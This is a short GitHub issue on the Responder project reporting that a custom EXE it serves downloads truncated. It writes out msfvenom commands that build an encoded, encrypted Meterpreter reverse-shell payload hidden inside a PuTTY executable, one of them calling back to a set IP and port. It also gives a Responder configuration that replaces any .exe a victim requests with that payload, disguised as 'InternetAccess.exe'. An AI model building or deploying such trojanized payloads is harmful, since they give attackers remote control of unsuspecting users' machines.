lgandx/Responder

payload exe file download truncate?

wmagliano opened this issue · 0 comments

  1. Payload
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=8443 -f exe -a x64 -o putty-68-64-8443.exe --platform windows -x putty-68-64.exe -e x64/xor_dynamic -i 500 --encrypt xor --encrypt-key S3C43ts

  2. Configure Responder.conf
    ; Set to On to replace any requested .exe with the custom EXE
    Serve-Exe = On

; Set to On to serve the custom HTML if the URL does not contain .exe
; Set to Off to inject the 'HTMLToInject' in web pages instead
Serve-Html = On

; Custom HTML to serve
HtmlFilename = /mnt/AccessDenied.html

; Custom EXE File to serve
ExeFilename = /mnt/putty-68-64-8443.exe

; Name of the downloaded .exe that the client will see
ExeDownloadName = InternetAccess.exe

  1. When you download via Reponder the size is truncated to 108Kb

Only when you try a payload like this... woks
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.56.115 LPORT=8443 -f exe -a x64